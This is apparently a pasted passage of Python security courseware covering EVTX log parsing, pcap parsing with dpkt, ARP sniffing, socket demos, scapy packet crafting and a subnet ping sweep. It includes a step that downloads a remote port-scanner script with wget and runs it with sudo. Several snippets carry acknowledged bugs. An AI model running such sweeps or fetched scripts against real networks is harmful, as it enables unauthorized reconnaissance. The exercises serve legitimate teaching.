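"""Show the newest N events of a Windows EVTX log as 'Event ID: <id> - Event: <name>' lines.

The binary log is first rendered to <name>.xml with the third-party python-evtx
package (pip install python-evtx); everything after that is standard library.
"""
import contextlib
import mmap
import re
import sys
from xml.dom import minidom
from xml.parsers.expat import ExpatError

DEFAULT_LOG = 'WIN-M751BADISCT_System'   # used when the file-name prompt is left empty
XML_HEADER = '<?xml version="1.0" encoding="utf-8" standalone="yes" ?><Events>'
# An '&' that does not already start an entity reference (&amp; &lt; &#123; ...) makes
# expat reject the whole document, so only those are escaped.
BARE_AMPERSAND = re.compile(r'&(?!#?\w+;)')


def evtx_to_xml(file_name):
    """Render every record of <file_name>.evtx into <file_name>.xml and return that path.

    Decoding stops at the first record python-evtx cannot parse. Rather than
    dropping the rest silently - a truncated dump can hide exactly the events
    an investigation is after - the count of records written so far and the
    error are reported on stderr.
    """
    # imported here so the XML helpers below can be used (and tested) without python-evtx installed
    from Evtx.Evtx import FileHeader
    from Evtx.Views import evtx_file_xml_view

    chunks = [XML_HEADER]
    with open(file_name + '.evtx', 'rb') as f:
        # mmap objects are not context managers on Python 2, hence contextlib.closing
        with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf:
            try:
                for xml, _record in evtx_file_xml_view(FileHeader(buf, 0x0)):
                    chunks.append(xml)
            except Exception as exc:  # python-evtx can raise several exception types on corrupt data
                sys.stderr.write('warning: stopped after %d records: %s\n' % (len(chunks) - 1, exc))
    chunks.append('</Events>')
    # ''.join rather than repeated +=: a large log would otherwise re-copy the growing string per record
    xml_text = ''.join(chunks)
    # the dump may contain bare <NULL> and <local> tags that expat rejects as unclosed
    xml_text = xml_text.replace('<NULL>', '<NULL></NULL>').replace('<local>', '<local></local>')
    xml_text = BARE_AMPERSAND.sub('&amp;', xml_text)
    out_path = file_name + '.xml'
    with open(out_path, 'w') as out:
        out.write(xml_text)
    return out_path


def event_id_of(event):
    """Text of the first <EventID> under an <Event> element, or None when it has none."""
    ids = event.getElementsByTagName('EventID')
    if not ids or not ids[0].childNodes:
        return None
    return ids[0].childNodes[0].nodeValue


def event_name_of(event):
    """Text of the second <string> under an <Event>, or 'Name not found'.

    NOTE(review): presumably the second <string> holds the event's message/name
    in this dump format - confirm against the generated XML.
    """
    strings = event.getElementsByTagName('string')
    if len(strings) < 2 or not strings[1].childNodes:
        return 'Name not found'
    return strings[1].childNodes[0].nodeValue


def describe(event):
    """One output line for an event: 'Event ID: <id> - Event   : <name>'."""
    return '%-8s: %s - %-8s: %s' % ('Event ID', event_id_of(event), 'Event', event_name_of(event))


def newest_events(events, count):
    """Return up to `count` events, newest (last in the file) first, skipping any without an <EventID>."""
    picked = []
    for event in reversed(events):
        if len(picked) == count:
            break
        if event_id_of(event) is not None:
            picked.append(event)
    return picked


def main():
    file_name = raw_input('Enter EVTX file name without extension : ') or DEFAULT_LOG
    try:
        xmldoc = minidom.parse(evtx_to_xml(file_name))
    except (IOError, ValueError, ExpatError) as exc:  # ValueError: an empty .evtx cannot be mmap'ed
        sys.exit('Invalid file... (%s)' % exc)
    # searching from the Document avoids assuming firstChild is <Events>
    events = xmldoc.getElementsByTagName('Event')

    try:
        event_num = int(raw_input('How many events you want to show : '))
    except ValueError:
        sys.exit('You have entered an invalid num...')
    # the log holds len(events) events, so asking for exactly that many is valid
    if event_num < 0 or event_num > len(events):
        sys.exit('You have entered an invalid num...')
    for event in newest_events(events, event_num):
        print(describe(event))
    sys.exit('...Search Complete...')


if __name__ == '__main__':
    main()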
922 | ||
923 | ||
924 | ||
925 | -------------TASK 2------------ | |
926 | vi readevtx2.py | |
927 | ||
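"""Print every event in a Windows EVTX log that has a given Event ID.

The binary log is first rendered to <name>.xml with the third-party python-evtx
package (pip install python-evtx); everything after that is standard library.
"""
import contextlib
import mmap
import re
import sys
from xml.dom import minidom
from xml.parsers.expat import ExpatError

DEFAULT_LOG = 'WIN-M751BADISCT_System'   # used when the file-name prompt is left empty
XML_HEADER = '<?xml version="1.0" encoding="utf-8" standalone="yes" ?><Events>'
# An '&' that does not already start an entity reference (&amp; &lt; &#123; ...) makes
# expat reject the whole document, so only those are escaped.
BARE_AMPERSAND = re.compile(r'&(?!#?\w+;)')


def evtx_to_xml(file_name):
    """Render every record of <file_name>.evtx into <file_name>.xml and return that path.

    Decoding stops at the first record python-evtx cannot parse; the count of
    records written so far and the error go to stderr instead of being dropped
    silently, because a truncated dump can hide the events being searched for.
    """
    # imported here so the XML helpers below can be used (and tested) without python-evtx installed
    from Evtx.Evtx import FileHeader
    from Evtx.Views import evtx_file_xml_view

    chunks = [XML_HEADER]
    with open(file_name + '.evtx', 'rb') as f:
        # mmap objects are not context managers on Python 2, hence contextlib.closing
        with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf:
            try:
                for xml, _record in evtx_file_xml_view(FileHeader(buf, 0x0)):
                    chunks.append(xml)
            except Exception as exc:  # python-evtx can raise several exception types on corrupt data
                sys.stderr.write('warning: stopped after %d records: %s\n' % (len(chunks) - 1, exc))
    chunks.append('</Events>')
    xml_text = ''.join(chunks)
    # the dump may contain bare <NULL> and <local> tags that expat rejects as unclosed
    xml_text = xml_text.replace('<NULL>', '<NULL></NULL>').replace('<local>', '<local></local>')
    xml_text = BARE_AMPERSAND.sub('&amp;', xml_text)
    out_path = file_name + '.xml'
    with open(out_path, 'w') as out:
        out.write(xml_text)
    return out_path


def event_id_of(event):
    """Text of the first <EventID> under an <Event> element, or None when it has none."""
    ids = event.getElementsByTagName('EventID')
    if not ids or not ids[0].childNodes:
        return None
    return ids[0].childNodes[0].nodeValue


def event_name_of(event):
    """Text of the second <string> under an <Event>, or 'Name not found'.

    NOTE(review): presumably the second <string> holds the event's message/name
    in this dump format - confirm against the generated XML.
    """
    strings = event.getElementsByTagName('string')
    if len(strings) < 2 or not strings[1].childNodes:
        return 'Name not found'
    return strings[1].childNodes[0].nodeValue


def describe(event):
    """One output line for an event: 'Event ID: <id> - Event   : <name>'."""
    return '%-8s: %s - %-8s: %s' % ('Event ID', event_id_of(event), 'Event', event_name_of(event))


def events_with_id(events, wanted):
    """Return the events whose numeric <EventID> equals `wanted` (an int); events without one are skipped."""
    matches = []
    for event in events:
        event_id = event_id_of(event)
        if event_id is None:
            continue
        try:
            if int(event_id) == wanted:
                matches.append(event)
        except ValueError:  # non-numeric EventID text
            continue
    return matches


def main():
    file_name = raw_input('Enter EVTX file name without extension : ') or DEFAULT_LOG
    try:
        xmldoc = minidom.parse(evtx_to_xml(file_name))
    except (IOError, ValueError, ExpatError) as exc:  # ValueError: an empty .evtx cannot be mmap'ed
        sys.exit('Invalid file... (%s)' % exc)
    events = xmldoc.getElementsByTagName('Event')

    try:
        event = int(raw_input('Enter Event ID : '))
    except ValueError:
        sys.exit('Event ID must be a number')
    for match in events_with_id(events, event):
        print(describe(match))
    sys.exit('...Search Complete...')


if __name__ == '__main__':
    main()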
981 | ||
982 | ||
983 | ||
984 | -------------TASK 3------------ | |
985 | vi readevtx3.py | |
986 | ||
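"""Count how many events in a Windows EVTX log carry a given Event ID.

The binary log is first rendered to <name>.xml with the third-party python-evtx
package (pip install python-evtx); everything after that is standard library.
"""
import contextlib
import mmap
import re
import sys
from xml.dom import minidom
from xml.parsers.expat import ExpatError

DEFAULT_LOG = 'WIN-M751BADISCT_System'   # used when the file-name prompt is left empty
XML_HEADER = '<?xml version="1.0" encoding="utf-8" standalone="yes" ?><Events>'
# An '&' that does not already start an entity reference (&amp; &lt; &#123; ...) makes
# expat reject the whole document, so only those are escaped.
BARE_AMPERSAND = re.compile(r'&(?!#?\w+;)')


def evtx_to_xml(file_name):
    """Render every record of <file_name>.evtx into <file_name>.xml and return that path.

    Decoding stops at the first record python-evtx cannot parse; the count of
    records written so far and the error go to stderr instead of being dropped
    silently - for a counting tool a silently truncated dump means a wrong number.
    """
    # imported here so the XML helpers below can be used (and tested) without python-evtx installed
    from Evtx.Evtx import FileHeader
    from Evtx.Views import evtx_file_xml_view

    chunks = [XML_HEADER]
    with open(file_name + '.evtx', 'rb') as f:
        # mmap objects are not context managers on Python 2, hence contextlib.closing
        with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf:
            try:
                for xml, _record in evtx_file_xml_view(FileHeader(buf, 0x0)):
                    chunks.append(xml)
            except Exception as exc:  # python-evtx can raise several exception types on corrupt data
                sys.stderr.write('warning: stopped after %d records: %s\n' % (len(chunks) - 1, exc))
    chunks.append('</Events>')
    xml_text = ''.join(chunks)
    # the dump may contain bare <NULL> and <local> tags that expat rejects as unclosed
    xml_text = xml_text.replace('<NULL>', '<NULL></NULL>').replace('<local>', '<local></local>')
    xml_text = BARE_AMPERSAND.sub('&amp;', xml_text)
    out_path = file_name + '.xml'
    with open(out_path, 'w') as out:
        out.write(xml_text)
    return out_path


def event_id_of(event):
    """Text of the first <EventID> under an <Event> element, or None when it has none."""
    ids = event.getElementsByTagName('EventID')
    if not ids or not ids[0].childNodes:
        return None
    return ids[0].childNodes[0].nodeValue


def count_events(events, wanted):
    """Number of events whose numeric <EventID> equals `wanted` (an int); events without one are not counted."""
    count = 0
    for event in events:
        event_id = event_id_of(event)
        if event_id is None:
            continue
        try:
            if int(event_id) == wanted:
                count += 1
        except ValueError:  # non-numeric EventID text
            continue
    return count


def main():
    file_name = raw_input('Enter EVTX file name without extension : ') or DEFAULT_LOG
    try:
        xmldoc = minidom.parse(evtx_to_xml(file_name))
    except (IOError, ValueError, ExpatError) as exc:  # ValueError: an empty .evtx cannot be mmap'ed
        sys.exit('Invalid file... (%s)' % exc)
    events = xmldoc.getElementsByTagName('Event')

    try:
        event = int(raw_input('Enter Event ID : '))
    except ValueError:
        sys.exit('Event ID must be a number')
    print('%-8s: %s - %-8s: %s' % ('Event ID', event, 'Count', count_events(events, event)))
    sys.exit('...Search Complete...')


if __name__ == '__main__':
    main()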
1039 | ||
1040 | ||
1041 | ||
1042 | -------------TASK 4------------ | |
1043 | vi readevtx4.py | |
1044 | ||
1045 | import mmap | |
1046 | import re | |
1047 | import contextlib | |
1048 | import sys | |
1049 | import operator | |
1050 | import HTMLParser | |
1051 | from xml.dom import minidom | |
1052 | from operator import itemgetter, attrgetter | |
1053 | ||
1054 | from Evtx.Evtx import FileHeader | |
1055 | from Evtx.Views import evtx_file_xml_view | |
1056 | ||
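# Sample log shipped with the courseware; used when nothing is typed at the prompt.
DEFAULT_FILE_NAME = 'WIN-M751BADISCT_System'
XML_HEADER = '<?xml version="1.0" encoding="utf-8" standalone="yes" ?><Events>'


def evtx_to_xml(file_name):
    """Render ``<file_name>.evtx`` to ``<file_name>.xml`` and return the XML text.

    The .evtx is memory-mapped read-only and each record is rendered with
    python-evtx's XML view.  Rendering is best effort, as in the original
    script: the first record that fails to render ends the walk and whatever
    was rendered so far is still written out.
    """
    parts = [XML_HEADER]
    # Binary mode: the file is memory-mapped, never decoded as text.
    with open(file_name + '.evtx', 'rb') as evtx:
        with contextlib.closing(mmap.mmap(evtx.fileno(), 0,
                                          access=mmap.ACCESS_READ)) as buf:
            fh = FileHeader(buf, 0x0)
            try:
                for xml, record in evtx_file_xml_view(fh):
                    parts.append(xml)
            except Exception:
                pass  # corrupt/truncated record: keep what was rendered so far
    parts.append('</Events>')
    xml_file = ''.join(parts)
    # Presumably the rendered XML contains unclosed <NULL>/<local> elements;
    # closing them keeps minidom from rejecting the file.
    xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
    xml_file = re.sub('<local>', '<local></local>', xml_file)
    # NOTE(review): as pasted this substitution is a no-op; the original most
    # likely escaped bare ampersands (e.g. to '&amp;') - confirm against the
    # courseware PDF before relying on it.
    xml_file = re.sub('&', '&', xml_file)
    with open(file_name + '.xml', 'w') as out:
        out.write(xml_file)
    return xml_file


def load_events(file_name):
    """Parse ``<file_name>.xml`` (written by evtx_to_xml) and return its <Event> nodes.

    Exits with 'Invalid file...' when minidom cannot parse it, as the original did.
    """
    try:
        xmldoc = minidom.parse(file_name + '.xml')
    except Exception:
        sys.exit('Invalid file...')
    return xmldoc.firstChild.getElementsByTagName('Event')


def collect_events(nodes):
    """Return ``[{'event_id': int, 'event_name': str}, ...]`` sorted by event_id.

    Args:
        nodes: iterable of minidom <Event> elements.

    ``event_name`` is the text of the second <string> element under the event
    (assumed to hold the event's name in the class sample - confirm); events
    without one get 'Name not found...'.  Events whose <EventID> is missing or
    non-numeric are skipped, as in the original.
    """
    events = []
    for node in nodes:
        try:
            event_id = int(node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue)
        except (IndexError, ValueError, TypeError):
            continue  # no EventID element / no text / non-numeric text
        try:
            event_name = node.getElementsByTagName('string')[1].childNodes[0].nodeValue
        except IndexError:
            event_name = 'Name not found...'
        events.append({'event_id': event_id, 'event_name': event_name})
    return sorted(events, key=itemgetter('event_id'))


def main():
    pars = HTMLParser.HTMLParser()
    # Demo of HTML entity unescaping (the entity in this literal looks mangled
    # by the paste; kept as-is).
    print(pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>'))
    # The original prompted and then overwrote the answer with the sample name;
    # the sample name is now only the default for an empty answer.
    file_name = str(raw_input('Enter EVTX file name without extension : ')).strip()
    if not file_name:
        file_name = DEFAULT_FILE_NAME
    evtx_to_xml(file_name)
    for e in collect_events(load_events(file_name)):
        print(e)
    sys.exit('...Search Complete...')


if __name__ == '__main__':
    main()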
1102 | ||
1103 | ||
1104 | ||
1105 | ||
1106 | ||
1107 | ||
1108 | ||
1109 | ||
1110 | ||
1111 | ################################################# | |
1112 | # Lesson 18: Parsing Packets with Python's DPKT # | |
1113 | ################################################# | |
1114 | The first thing that you will need to do is install dpkt. | |
1115 | ||
1116 | sudo apt-get install -y python-dpkt | |
1117 | ||
1118 | ||
1119 | ||
1120 | ||
Now cd to your courseware directory, and then cd into the subfolder '2-PCAP-Parsing/Resources'.
1122 | Run tcpdump to capture a .pcap file that we will use for the next exercise | |
1123 | ||
1124 | ||
1125 | sudo tcpdump -ni eth0 -s0 -w quick.pcap | |
1126 | ||
1127 | ||
1128 | --open another command prompt-- | |
1129 | wget http://packetlife.net/media/library/12/tcpdump.pdf | |
1130 | ||
1131 | ||
1132 | Let's do something simple: | |
1133 | ||
1134 | ||
1135 | vi quickpcap.py | |
1136 | -------------------------------------------------------- | |
1137 | ||
1138 | #!/usr/bin/python | |
1139 | import dpkt; | |
1140 | ||
1141 | # Simple script to read the timestamps in a pcap file | |
1142 | # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html | |
1143 | ||
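# Binary mode: pcap is a binary format.  The with-block closes the file even
# if a malformed record makes the reader raise mid-iteration (the original
# only closed it on the happy path).
with open("quick.pcap", "rb") as f:
    pcap = dpkt.pcap.Reader(f)
    for ts, buf in pcap:
        print(ts)  # capture timestamp of each frame; buf is the raw frame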
1151 | ||
1152 | ||
1153 | -------------------------------------------------------- | |
1154 | ||
1155 | Now let's run the script we just wrote | |
1156 | ||
1157 | ||
1158 | python quickpcap.py | |
1159 | ||
1160 | ||
1161 | ||
1162 | ||
1163 | How dpkt breaks down a packet: | |
1164 | ||
1165 | Reference: | |
1166 | http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html | |
1167 | ||
1168 | src: the MAC address of SOURCE. | |
1169 | dst: The MAC address of DESTINATION | |
1170 | type: The protocol type of contained ethernet payload. | |
1171 | ||
1172 | The allowed values are listed in the file "ethernet.py", | |
1173 | such as: | |
1174 | a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data. | |
1175 | b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data. | |
1176 | ||
1177 | ||
1178 | References: | |
1179 | http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python | |
1180 | ||
1181 | ||
1182 | ||
1183 | ||
1184 | ||
1185 | ||
1186 | Ok - now let's have a look at pcapparsing.py | |
1187 | ||
1188 | sudo tcpdump -ni eth0 -s0 -w capture-100.pcap | |
1189 | ||
1190 | ||
1191 | --open another command prompt-- | |
1192 | wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf | |
1193 | ||
1194 | ||
1195 | ||
1196 | Ok - now let's have a look at pcapparsing.py | |
1197 | -------------------------------------------------------- | |
1198 | ||
1199 | import socket | |
1200 | import dpkt | |
1201 | import sys | |
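# Binary mode: pcap is a binary format.  The with-block closes the file even
# if a malformed record makes the reader raise mid-iteration.
with open('capture-100.pcap', 'rb') as f:
    pcapReader = dpkt.pcap.Reader(f)
    for ts, data in pcapReader:
        ether = dpkt.ethernet.Ethernet(data)
        # A bare `raise` outside an except clause is itself an error (that is
        # the traceback shown below); non-IP frames (ARP, IPv6, ...) are simply
        # skipped instead.
        if ether.type != dpkt.ethernet.ETH_TYPE_IP:
            continue
        ip = ether.data
        tcp = ip.data
        # Only TCP and UDP carry ports; an ICMP payload has no .sport/.dport.
        if not isinstance(tcp, (dpkt.tcp.TCP, dpkt.udp.UDP)):
            continue
        src = socket.inet_ntoa(ip.src)
        srcport = tcp.sport
        dst = socket.inet_ntoa(ip.dst)
        dstport = tcp.dport
        print("src: %s (port : %s)-> dest: %s (port %s)" % (src, srcport, dst, dstport))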
1217 | ||
1218 | -------------------------------------------------------- | |
1219 | ||
1220 | ||
1221 | ||
1222 | OK - let's run it: | |
1223 | python pcapparsing.py | |
1224 | ||
1225 | ||
1226 | ||
Running this script might throw an error like this:
1228 | ||
1229 | Traceback (most recent call last): | |
1230 | File "pcapparsing.py", line 9, in <module> | |
1231 | if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise | |
1232 | ||
1233 | ||
If it does, it is just because the capture contains a packet type that the script does not handle (ICMP, for example).
1235 | ||
1236 | ||
1237 | ||
1238 | ||
1239 | Your homework for today... | |
1240 | ||
1241 | ||
1242 | Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports. | |
1243 | ||
1244 | ||
1245 | ||
1246 | ||
1247 | ||
1248 | ||
1249 | Your challenge is to fix the Traceback error | |
1250 | ||
1251 | ||
1252 | ||
1253 | ||
1254 | #!/usr/bin/python | |
1255 | ||
1256 | import pcapy | |
1257 | import dpkt | |
1258 | import sys | |
1259 | import socket | |
1260 | import struct | |
1261 | ||
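SINGLE_SHOT = False      # True: handle one packet and exit; False: capture until interrupted

# List all the network devices.  The original discarded the return value, so
# nothing was ever shown; print it so the user can pick an interface name.
print(pcapy.findalldevs())

iface = "eth0"
bpf_filter = "arp"       # BPF expression: only ARP frames reach the callback (renamed: `filter` shadowed the builtin)
max_bytes = 1024         # snapshot length: bytes kept per captured packet
promiscuous = False
read_timeout = 100       # in milliseconds

pc = pcapy.open_live(iface, max_bytes, promiscuous, read_timeout)
pc.setfilter(bpf_filter)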
1275 | ||
1276 | # callback for received packets | |
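def recv_pkts(hdr, data):
    """pcapy callback: print the IP and MAC address pairs of one captured ARP frame.

    Args:
        hdr:  pcapy packet header (timestamp/length); unused here.
        data: raw frame bytes, parsed as Ethernet by dpkt.
    """
    packet = dpkt.ethernet.Ethernet(data)
    arp = packet.data
    print(type(arp))
    # The BPF filter should leave only ARP, but a non-ARP payload has no
    # spa/tpa/sha/tha attributes and would crash the capture loop - skip it.
    if not isinstance(arp, dpkt.arp.ARP):
        return

    print("ipsrc: %s, ipdst: %s" % (
        socket.inet_ntoa(arp.spa),
        socket.inet_ntoa(arp.tpa)))

    # Each MAC is six raw bytes; printed as hex octets (unpadded, as originally).
    print("macsrc: %s, macdst: %s " % (
        "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB", arp.sha),
        "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB", arp.tha)))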
1288 | ||
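if SINGLE_SHOT:
    # The original read one packet and exited without ever looking at it; run
    # the same callback on it so single-shot mode actually prints something.
    header, data = pc.next()
    recv_pkts(header, data)
    sys.exit(0)
else:
    packet_limit = -1  # infinite
    pc.loop(packet_limit, recv_pkts)  # capture packets until interrupted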
1295 | ||
1296 | ||
1297 | ||
1298 | ||
1299 | ||
1300 | ||
1301 | ||
1302 | ||
1303 | ############################# | |
1304 | # Reference Videos To Watch # | |
1305 | ############################# | |
1306 | Here is your second set of youtube videos that I'd like for you to watch: | |
1307 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20) | |
1308 | ||
1309 | ||
1310 | ||
1311 | ||
1312 | ############################################# | |
1313 | # Lesson 19: Python Sockets & Port Scanning # | |
1314 | ############################################# | |
1315 | ||
1316 | ||
1317 | $ ncat -l -v -p 1234 | |
1318 | ||
1319 | ||
1320 | ||
1321 | ||
1322 | --open another terminal-- | |
1323 | python | |
1324 | ||
1325 | >>> import socket | |
1326 | >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1327 | >>> s.connect(('localhost', 1234)) | |
1328 | >>> s.send('Hello, world') | |
1329 | >>> data = s.recv(1024) | |
1330 | >>> s.close() | |
1331 | ||
>>> print 'Received', data
1333 | ||
1334 | ||
1335 | ||
1336 | ||
1337 | ||
1338 | ||
1339 | ######################################## | |
1340 | # Lesson 20: TCP Client and TCP Server # | |
1341 | ######################################## | |
1342 | ||
1343 | vi tcpclient.py | |
1344 | ||
1345 | ||
1346 | ||
1347 | #!/usr/bin/python | |
1348 | # tcpclient.py | |
1349 | ||
1350 | import socket | |
1351 | ||
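s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostport = ("127.0.0.1", 1337)   # the tcpserver.py demo listens here
try:
    s.connect(hostport)
    s.sendall("Hello\n")          # sendall: plain send() may deliver only part of the buffer
    buf = s.recv(1024)
    print "Received", buf
finally:
    s.close()                     # the original never closed the socket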
1358 | ||
1359 | ||
1360 | ||
1361 | ||
1362 | ||
1363 | ||
1364 | ||
1365 | ||
1366 | ||
1367 | vi tcpserver.py | |
1368 | ||
1369 | ||
1370 | ||
1371 | ||
1372 | ||
1373 | #!/usr/bin/python | |
1374 | # tcpserver.py | |
1375 | ||
1376 | import socket | |
1377 | ||
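s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Lets the server be restarted right away instead of failing with
# "Address already in use" while the previous socket sits in TIME_WAIT.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
hostport = ("", 1337)   # "" = every interface; use "127.0.0.1" when only the local client should reach it
s.bind(hostport)
s.listen(10)            # backlog of not-yet-accepted connections
while 1:
    cli, addr = s.accept()
    print "Connection from", addr
    try:
        buf = cli.recv(1024)
        print "Received", buf
        if buf == "Hello\n":
            cli.sendall("Server ID 1\n")
    finally:
        cli.close()     # also on error, so a misbehaving client cannot leak sockets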
1390 | ||
1391 | ||
1392 | ||
1393 | ||
1394 | ||
1395 | ||
1396 | ||
1397 | ||
1398 | python tcpserver.py | |
1399 | ||
1400 | ||
1401 | --open another terminal-- | |
1402 | python tcpclient.py | |
1403 | ||
1404 | ||
1405 | ######################################## | |
1406 | # Lesson 21: UDP Client and UDP Server # | |
1407 | ######################################## | |
1408 | ||
1409 | vi udpclient.py | |
1410 | ||
1411 | ||
1412 | ||
1413 | ||
1414 | ||
1415 | ||
1416 | #!/usr/bin/python | |
1417 | # udpclient.py | |
1418 | ||
1419 | import socket | |
1420 | ||
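s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)   # the udpserver.py demo listens here
try:
    s.sendto("Hello\n", hostport)
    buf = s.recv(1024)            # blocks until a datagram arrives (no timeout, as in the original)
    print(buf)
finally:
    s.close()                     # the original never closed the socket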
1426 | ||
1427 | ||
1428 | ||
1429 | ||
1430 | ||
1431 | ||
1432 | ||
1433 | ||
1434 | ||
1435 | vi udpserver.py | |
1436 | ||
1437 | ||
1438 | ||
1439 | ||
1440 | ||
1441 | ||
1442 | #!/usr/bin/python | |
1443 | # udpserver.py | |
1444 | ||
1445 | import socket | |
1446 | ||
# Minimal UDP responder: answers a "Hello\n" datagram with "Server ID 1\n".
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)   # loopback only
server.bind(hostport)
while True:
    datagram, peer = server.recvfrom(1024)
    print(datagram)
    if datagram == "Hello\n":
        server.sendto("Server ID 1\n", peer)
1455 | ||
1456 | ||
1457 | ||
1458 | ||
1459 | ||
1460 | ||
1461 | python udpserver.py | |
1462 | ||
1463 | ||
1464 | --open another terminal-- | |
1465 | python udpclient.py | |
1466 | ||
1467 | ||
1468 | ||
1469 | ||
1470 | ||
1471 | ||
1472 | ############################### | |
1473 | # Lesson 22: Installing Scapy # | |
1474 | ############################### | |
1475 | ||
1476 | sudo apt-get update | |
1477 | sudo apt-get install python-scapy python-pyx python-gnuplot | |
1478 | ||
1479 | ||
1480 | Reference Page For All Of The Commands We Will Be Running: | |
1481 | http://samsclass.info/124/proj11/proj17-scapy.html | |
1482 | ||
1483 | Great slides for Scapy: | |
1484 | http://www.secdev.org/conf/scapy_csw05.pdf | |
1485 | ||
1486 | ||
1487 | ||
1488 | ||
1489 | To run Scapy interactively | |
1490 | ||
1491 | sudo scapy | |
1492 | ||
1493 | ||
1494 | ||
1495 | ################################################ | |
1496 | # Lesson 23: Sending ICMPv4 Packets with scapy # | |
1497 | ################################################ | |
1498 | ||
1499 | In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key: | |
1500 | ||
1501 | i = IP() | |
1502 | ||
1503 | ||
1504 | ||
1505 | ||
1506 | This creates an object named i of type IP. To see the properties of that object, use the display() method with this command: | |
1507 | ||
1508 | i.display() | |
1509 | ||
1510 | ||
1511 | ||
1512 | ||
1513 | Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine: | |
1514 | ||
1515 | i.dst="10.65.75.49" | |
1516 | ||
1517 | i.display() | |
1518 | ||
1519 | ||
1520 | ||
1521 | ||
1522 | Notice that scapy automatically fills in your machine's source IP address. | |
1523 | ||
1524 | Use these commands to create an object named ic of type ICMP and display its properties: | |
1525 | ||
1526 | ||
1527 | ic = ICMP() | |
1528 | ||
1529 | ic.display() | |
1530 | ||
1531 | ||
1532 | ||
1533 | ||
1534 | ||
1535 | Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L: | |
1536 | ||
1537 | sr1(i/ic) | |
1538 | ||
1539 | ||
1540 | ||
1541 | ||
1542 | ||
1543 | This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply. | |
1544 | ||
1545 | The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding. | |
1546 | ||
1547 | Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name): | |
1548 | ||
1549 | ||
1550 | sr1(i/ic/"YOUR NAME") | |
1551 | ||
1552 | ||
1553 | You should see a reply with a Raw section containing your name. | |
1554 | ||
1555 | ||
1556 | ||
1557 | ############################################## | |
1558 | # Lesson 24: Sending a UDP Packet with Scapy # | |
1559 | ############################################## | |
1560 | ||
1561 | ||
1562 | Preparing the Target | |
1563 | $ ncat -ulvp 4444 | |
1564 | ||
1565 | ||
1566 | ||
1567 | ||
1568 | --open another terminal-- | |
1569 | In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key: | |
1570 | ||
1571 | u = UDP() | |
1572 | ||
1573 | u.display() | |
1574 | ||
1575 | ||
1576 | ||
1577 | This creates an object named u of type UDP, and displays its properties. | |
1578 | ||
1579 | Execute these commands to change the destination port to 4444 and display the properties again: | |
1580 | ||
1581 | i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer) | |
1582 | ||
1583 | u.dport = 4444 | |
1584 | ||
1585 | u.display() | |
1586 | ||
1587 | ||
1588 | ||
1589 | Execute this command to send the packet to the Windows machine: | |
1590 | ||
1591 | send(i/u/"YOUR NAME SENT VIA UDP\n") | |
1592 | ||
1593 | ||
1594 | ||
1595 | On the Windows target, you should see the message appear | |
1596 | ||
1597 | ||
1598 | ||
1599 | ||
1600 | ####################################### | |
1601 | # Lesson 25: Ping Sweeping with Scapy # | |
1602 | ####################################### | |
1603 | ||
1604 | ||
1605 | ||
1606 | #!/usr/bin/python | |
1607 | from scapy.all import * | |
1608 | ||
TIMEOUT = 2            # seconds to wait for each echo reply
conf.verb = 0          # silence scapy's per-packet send/receive chatter
for ip in range(0, 256):
    # One ICMP echo request per address of the 10.10.30.0/24 block;
    # ttl=20 is a low hop limit (presumably to keep the probes local).
    packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
    reply = sr1(packet, timeout=TIMEOUT)
    if not (reply is None):
        # NOTE(review): reply.dst is the destination of the *reply* (this host),
        # so every hit prints the same address; the responder is reply.src or
        # packet[IP].dst - confirm before relying on the output.
        print reply.dst, "is online"
    else:
        print "Timeout waiting for %s" % packet[IP].dst
1618 | ||
1619 | ||
1620 | ||
1621 | ############################################### | |
1622 | # Checking out some scapy based port scanners # | |
1623 | ############################################### | |
1624 | ||
1625 | wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py | |
1626 | ||
1627 | cat rdp_scan.py | |
1628 | ||
1629 | sudo python rdp_scan.py 10.10.30.250 | |
1630 | ||
1631 | ||
1632 | ||
1633 | ###################################### | |
1634 | # Dealing with conf.verb=0 NameError # | |
1635 | ###################################### | |
1636 | ||
1637 | conf.verb = 0 | |
1638 | NameError: name 'conf' is not defined | |
1639 | ||
1640 | Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from: | |
1641 | ||
1642 | from scapy import * | |
1643 | to | |
1644 | from scapy.all import * | |
1645 | ||
1646 | ||
1647 | ||
1648 | Reference: | |
